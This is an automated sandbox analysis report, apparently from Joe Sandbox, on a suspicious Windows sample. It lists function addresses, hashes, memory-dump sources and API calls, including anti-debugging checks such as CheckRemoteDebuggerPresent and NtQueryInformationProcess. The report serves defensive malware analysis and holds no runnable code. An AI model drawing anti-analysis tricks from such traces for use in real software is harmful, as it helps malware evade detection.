                        • Instruction ID: 93d6109fa5423146264a751745d21282d6a9e76231d57247afd5cebad78c137b
                        • Opcode Fuzzy Hash: 75d5028504d558d2fa779921168a20b2e259761b1ce9900fa795a047d6e9255b
                        • Instruction Fuzzy Hash: E6315CB19053889FDB01CFADD844ACEBFF4BF4A310F04809AE554E7262D3789948CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144EFF0 Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 0144F0BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: 803ef157610a9e148df68e4432fdad9cb5efaed10419383d2a05b9e3cb82a9b3
                        • Instruction ID: c592de3b650611fcce7d1bea1573573811553d9c44b49a527de0d9499c59c907
                        • Opcode Fuzzy Hash: 803ef157610a9e148df68e4432fdad9cb5efaed10419383d2a05b9e3cb82a9b3
                        • Instruction Fuzzy Hash: A83112B5A003498FDB14CFADD844ADEBBF0FB88310F10856AE918A7351D379A944CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144F030 Relevance: 1.6, APIs: 1, Instructions: 61nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 0144F0BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: dfc6c088c7ad12b7eefd6a41996d91c58657d32ce218cff39f664d6746e292a5
                        • Instruction ID: 0ef53b08f23c744bb68e769df80903cd5b4e1c8713d4bfc0cc0c59681a86f8b8
                        • Opcode Fuzzy Hash: dfc6c088c7ad12b7eefd6a41996d91c58657d32ce218cff39f664d6746e292a5
                        • Instruction Fuzzy Hash: 9421F0B59003499FDB10CF9ED884ADEBBF4FB48310F10842AE918A7350D378A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD0BE8 Relevance: 1.6, Strings: 1, Instructions: 310COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: {([]
                        • API String ID: 0-3887154703
                        • Opcode ID: d1747aae4eaede2f35798dd3b6655e858265bba7415ba38ace71008059d72133
                        • Instruction ID: 77244071d7d614559c911c2a8c35b3e878aacf612f770e8c26cf945a96e80101
                        • Opcode Fuzzy Hash: d1747aae4eaede2f35798dd3b6655e858265bba7415ba38ace71008059d72133
                        • Instruction Fuzzy Hash: F7B1E372E006298BCB18DE6DC48459DB7F7BB98714F5A85AAD805FB354D7709C05CBC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144EE00 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                        Download Yara Rule
                        APIs
                        • CheckRemoteDebuggerPresent.KERNEL32 ref: 0144EE5C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CheckDebuggerPresentRemote
                        • String ID:
                        • API String ID: 3662101638-0
                        • Opcode ID: f14d516e451f99fe90422cde22485dca8cc1540da9f83f770ec0cf8504bc808c
                        • Instruction ID: 3a6502f7da850c91c3b037b36aa3c5450751885b265d21496e9ff8344be25280
                        • Opcode Fuzzy Hash: f14d516e451f99fe90422cde22485dca8cc1540da9f83f770ec0cf8504bc808c
                        • Instruction Fuzzy Hash: 3C1100B58003498FDB20DF9AC445BEEBBF8EB08320F20845AD528A3251D378A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD0BD9 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: {([]
                        • API String ID: 0-3887154703
                        • Opcode ID: 746c6103d8d7dfa17e4eb5f2354b494dfca992e9da2876d9e66dd6e85839f2fd
                        • Instruction ID: 514a47cbc99c04682f891f3a2eeb8900be0f02b8b67482c5c511ac1c96b1fb35
                        • Opcode Fuzzy Hash: 746c6103d8d7dfa17e4eb5f2354b494dfca992e9da2876d9e66dd6e85839f2fd
                        • Instruction Fuzzy Hash: 26511533F106394BCB14DEAD88541ADBAE7ABD8654F4A81BADC05FB351D6718C098BD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01440A60 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: zfxv
                        • API String ID: 0-924585857
                        • Opcode ID: 259a902e79d734d2a987bb58a18c6e5f27ba43bf2de33e8008b7bf5dd75ca707
                        • Instruction ID: 8deef75a5d022f4571c34465b7c1da22b48c88bfd8d33f7fd19b1e28a6bd2449
                        • Opcode Fuzzy Hash: 259a902e79d734d2a987bb58a18c6e5f27ba43bf2de33e8008b7bf5dd75ca707
                        • Instruction Fuzzy Hash: 4351E6B7F005368BA714DEADC8805AFB7E2ABA8610716416ADC45FB360DA70DD02CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09AC9CA0 Relevance: .6, Instructions: 648COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 70887d0ba70ca5aec3d51de8ddb6babd12496028b40986f7bea58bb194ccb43d
                        • Instruction ID: 951594d7e5d72297c46b9d9869c39e2346e301605090bd16ee8d9760b575c6f9
                        • Opcode Fuzzy Hash: 70887d0ba70ca5aec3d51de8ddb6babd12496028b40986f7bea58bb194ccb43d
                        • Instruction Fuzzy Hash: D0525B71A00619CFCB15CF68C884BAAB7B6FF44704F5584A9E81AAF261D771FD85CB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144F2A8 Relevance: .4, Instructions: 430COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4924001646bacf88df108ba14f64d4a3fa120ff6524930bd8c7eb789b817375b
                        • Instruction ID: 1bb6ebe781b2055ab084b6a73be75ed05b1529d8abdb4c82b2cdab26e2b2ff3a
                        • Opcode Fuzzy Hash: 4924001646bacf88df108ba14f64d4a3fa120ff6524930bd8c7eb789b817375b
                        • Instruction Fuzzy Hash: F8E1E135F003158FEB15DFBDC8849AEBBB2BF98300B15816AD505DB362DA709C4ACB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDB904 Relevance: .3, Instructions: 253COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 449491debbd594e091fbda485c3b29005a1d31b853f02ae0b95018df73755192
                        • Instruction ID: 848e8ad48dfc553df98993cdb36ef281f26d656196bb380659cab5329a7331d2
                        • Opcode Fuzzy Hash: 449491debbd594e091fbda485c3b29005a1d31b853f02ae0b95018df73755192
                        • Instruction Fuzzy Hash: 38A18F75E0071A9FCB00DFA4D8549EDBBBAFF89304F158215E41AAB364DB30AC46CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDB8F8 Relevance: .2, Instructions: 220COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e49d66fb43bd254695d2df24221bd7d994c270f010300529624123f84be7f18
                        • Instruction ID: 9c767e90d67ee29fddd1b34189b7f2dc9a57260da47c74fee130e516849c1014
                        • Opcode Fuzzy Hash: 1e49d66fb43bd254695d2df24221bd7d994c270f010300529624123f84be7f18
                        • Instruction Fuzzy Hash: 3C918E75E0071A9FCB00DFA4D8949DDBBBAFF89304B158219E419AB3A4DB30AD46CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDD870 Relevance: .2, Instructions: 218COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 32d75844e875c8d399bb156afdb68e9c23e39d693cb4f254b40e8f3388918ee2
                        • Instruction ID: ebf7a71377305ba5748005ac591ba25886b44c60d55d1fed68fd6d1e234686d4
                        • Opcode Fuzzy Hash: 32d75844e875c8d399bb156afdb68e9c23e39d693cb4f254b40e8f3388918ee2
                        • Instruction Fuzzy Hash: 36915E75E0071A9FCB04DFA0D8849DDBBBAFF99304B158215E419AB364DB30ED46CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09AC0848 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2233 9ac0848-9ac08d7 GetCurrentProcess 2237 9ac08d9-9ac08df 2233->2237 2238 9ac08e0-9ac0914 GetCurrentThread 2233->2238 2237->2238 2239 9ac091d-9ac0951 GetCurrentProcess 2238->2239 2240 9ac0916-9ac091c 2238->2240 2242 9ac095a-9ac0972 2239->2242 2243 9ac0953-9ac0959 2239->2243 2240->2239 2254 9ac0975 call 9ac0df9 2242->2254 2255 9ac0975 call 9ac0a17 2242->2255 2243->2242 2246 9ac097b-9ac09aa GetCurrentThreadId 2247 9ac09ac-9ac09b2 2246->2247 2248 9ac09b3-9ac0a15 2246->2248 2247->2248 2254->2246 2255->2246
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 09AC08C6
                        • GetCurrentThread.KERNEL32 ref: 09AC0903
                        • GetCurrentProcess.KERNEL32 ref: 09AC0940
                        • GetCurrentThreadId.KERNEL32 ref: 09AC0999
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 484f0f5dba87601c3129a4778ea428dcd46a74e5a0a6a47051ebe172c8240bce
                        • Instruction ID: 73bb127a511d25b817fac6fe04047ef777a11050d199550bdb858438cdab1c49
                        • Opcode Fuzzy Hash: 484f0f5dba87601c3129a4778ea428dcd46a74e5a0a6a47051ebe172c8240bce
                        • Instruction Fuzzy Hash: 205155B0900349CFEB14DFAAD548BAEBBF5EF48314F208459E419A7360D778A944CF65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09AC0847 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2210 9ac0847-9ac08d7 GetCurrentProcess 2214 9ac08d9-9ac08df 2210->2214 2215 9ac08e0-9ac0914 GetCurrentThread 2210->2215 2214->2215 2216 9ac091d-9ac0951 GetCurrentProcess 2215->2216 2217 9ac0916-9ac091c 2215->2217 2219 9ac095a-9ac0972 2216->2219 2220 9ac0953-9ac0959 2216->2220 2217->2216 2231 9ac0975 call 9ac0df9 2219->2231 2232 9ac0975 call 9ac0a17 2219->2232 2220->2219 2223 9ac097b-9ac09aa GetCurrentThreadId 2224 9ac09ac-9ac09b2 2223->2224 2225 9ac09b3-9ac0a15 2223->2225 2224->2225 2231->2223 2232->2223
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 09AC08C6
                        • GetCurrentThread.KERNEL32 ref: 09AC0903
                        • GetCurrentProcess.KERNEL32 ref: 09AC0940
                        • GetCurrentThreadId.KERNEL32 ref: 09AC0999
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 3d119101c356063fff6c36643e067bfcf98fd2594be9aa76d9740b45b2274a00
                        • Instruction ID: 20ddde48f971dce9f5b1547f08bce7894fcaa47e8e66a3ab0714c9a480aec394
                        • Opcode Fuzzy Hash: 3d119101c356063fff6c36643e067bfcf98fd2594be9aa76d9740b45b2274a00
                        • Instruction Fuzzy Hash: 7E5155B0900349CFEB14DFA9E548BAEBBF5EF48314F208459E419A7360D738A944CF65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDD570 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DDD682
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 74c94d25fc4f95a1414a809676abe6ed0b12868fd09ac14f8d39562f374dc710
                        • Instruction ID: ed6a786c0648cd911ba9fc313cbf8c6e18008b58e527028c42b0f73557176ce6
                        • Opcode Fuzzy Hash: 74c94d25fc4f95a1414a809676abe6ed0b12868fd09ac14f8d39562f374dc710
                        • Instruction Fuzzy Hash: 3A41B0B5D003499FDF14CF99C984ADEBBB6BF48314F24812AE819AB350D775A845CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDD566 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DDD682
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 67f6dcde76a1c57cbe284c7bc62513bcc810c9c44c4b0b06327771bab8aa3d60
                        • Instruction ID: 10be6a083649f2453ef6a3be16155bd4283cfeba84d91daf427601869c5fd561
                        • Opcode Fuzzy Hash: 67f6dcde76a1c57cbe284c7bc62513bcc810c9c44c4b0b06327771bab8aa3d60
                        • Instruction Fuzzy Hash: 0541CEB5D00349DFDF14CF99C984ADEBBB2BF48314F24812AE819AB250D774A885CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09AC0714 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 09AC1951
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: 846ebe86e2e52784356e076e6562dabe584545cf3c6b1b4b36ec320196439f98
                        • Instruction ID: adf63bfe25cf18173d9e12503242c99e551a84e4fa95664663f25d56a381c0b4
                        • Opcode Fuzzy Hash: 846ebe86e2e52784356e076e6562dabe584545cf3c6b1b4b36ec320196439f98
                        • Instruction Fuzzy Hash: AD4128B5A043099FDB14DF99C448AAAFBF5FF88714F24C459E519AB321D378A841CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD03B0 Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,?,?,?,?,?,?), ref: 02DD0482
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: f5b971564f6e2325e4f9c8d4fc361d75ba7b0cfde8f7027b25b3f277fd400a78
                        • Instruction ID: 910cd91474a76d1c87d74bf4ad1f236f7312a5731bcf4baa061373d0ff4e13fc
                        • Opcode Fuzzy Hash: f5b971564f6e2325e4f9c8d4fc361d75ba7b0cfde8f7027b25b3f277fd400a78
                        • Instruction Fuzzy Hash: 7A3164718093999FCB01CF99D8506DEBFB4FF4A310F14809AE958AB252C3799914CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD06A1 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        • CreateFileMappingW.KERNELBASE(?,?,?,?,?,00000000), ref: 02DD074D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateFileMapping
                        • String ID:
                        • API String ID: 524692379-0
                        • Opcode ID: 8c0a31731b27bcad08949f17151d1a4d7ceacfc3390c7f1ee30c22e349ffb49b
                        • Instruction ID: e8d05457650a8d6c69a6c2fceecafd2e4655eeccd590670f5f928e6269cc6afb
                        • Opcode Fuzzy Hash: 8c0a31731b27bcad08949f17151d1a4d7ceacfc3390c7f1ee30c22e349ffb49b
                        • Instruction Fuzzy Hash: AE3159719043899FCB11DFAAC484ADEBFF4FF49310F14845AE559AB252C378A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09AC0A90 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09AC0B17
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: e5ea10a827220dfd1db757245a950e1d886b6bdcbb034deded636a22ee50fa18
                        • Instruction ID: 2e2eb8dba028f58d4179034fb48c8b1aebfb6e2c16222c4668f572d88605e6c4
                        • Opcode Fuzzy Hash: e5ea10a827220dfd1db757245a950e1d886b6bdcbb034deded636a22ee50fa18
                        • Instruction Fuzzy Hash: 7C21E4B5900248DFDB10CF9AD984ADEBBF8FB48710F14801AE918A7350C378A954CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09AC0A89 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09AC0B17
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 10a0f8fdcea803ae9d8d78f3e7cb14bb7c147123e953e601868cb8fdda593240
                        • Instruction ID: 91494809310bc5febd2c189141ca2bc6e1341bea464b1680d8fb97def045de11
                        • Opcode Fuzzy Hash: 10a0f8fdcea803ae9d8d78f3e7cb14bb7c147123e953e601868cb8fdda593240
                        • Instruction Fuzzy Hash: E121E3B5900248DFDB10CFA9D584AEEBBF5EB48314F14841AE918A7351D378A954CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD06C8 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                        • CreateFileMappingW.KERNELBASE(?,?,?,?,?,00000000), ref: 02DD074D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateFileMapping
                        • String ID:
                        • API String ID: 524692379-0
                        • Opcode ID: 3e6416ec255cd0c783f75d600eaf4097bd4b63a4fd565ee81aaa52384572d159
                        • Instruction ID: 96c3b84a8eb37613a32f42202bf7b4ecc154c88a9e5ac5f0ace27893f0ac10c9
                        • Opcode Fuzzy Hash: 3e6416ec255cd0c783f75d600eaf4097bd4b63a4fd565ee81aaa52384572d159
                        • Instruction Fuzzy Hash: E72115B59002499FCB10DF9AD584ADEBBF4FF48310F108429E819A7350D778A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD0AA8 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 02DD0B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: b1d8b9bcf6d148519f4c89b3e5d9021199e7b7ba0b4bc341f157869059d317cb
                        • Instruction ID: 7778337f16b383e6343f1d27901c8c4ef3401b9ea8ca6bf6f5aa41f9be5c1d8d
                        • Opcode Fuzzy Hash: b1d8b9bcf6d148519f4c89b3e5d9021199e7b7ba0b4bc341f157869059d317cb
                        • Instruction Fuzzy Hash: A02115B59007499FCB10DF9AD444ADEBBF4EF89320F108429E968A7341D778A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD0400 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,?,?,?,?,?,?), ref: 02DD0482
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 205699a6527edb01d3d9870746cbf3187644841e019d69c28b965b2fac9de719
                        • Instruction ID: 64dd9c1873a6395efa4878219e8656b43c53eccb31a03a7e868300f72cf310d7
                        • Opcode Fuzzy Hash: 205699a6527edb01d3d9870746cbf3187644841e019d69c28b965b2fac9de719
                        • Instruction Fuzzy Hash: DE2104B5900659AFCB10DF9AD944ADEFBB4FB48710F10811AE918A7350C375A954CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD0AB0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 02DD0B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: dde37341ec11a8e35e7246c3ca3b54e329a1b59efe426820c8798207eca2bb0b
                        • Instruction ID: 6a62504a61db2592e85c8f793704a313ae728c3bef9b6d96e67e6848b89530cd
                        • Opcode Fuzzy Hash: dde37341ec11a8e35e7246c3ca3b54e329a1b59efe426820c8798207eca2bb0b
                        • Instruction Fuzzy Hash: D22103B59006499FCB10DF9AC584ADEBBF4FF88324F108429E968A7351D778A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09ACB17C Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,09ACC3D1,00000800), ref: 09ACC462
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 075aae34ab59b0ffeee53da522c96feed6e46448f88c36a257e70c1e5ad22e6a
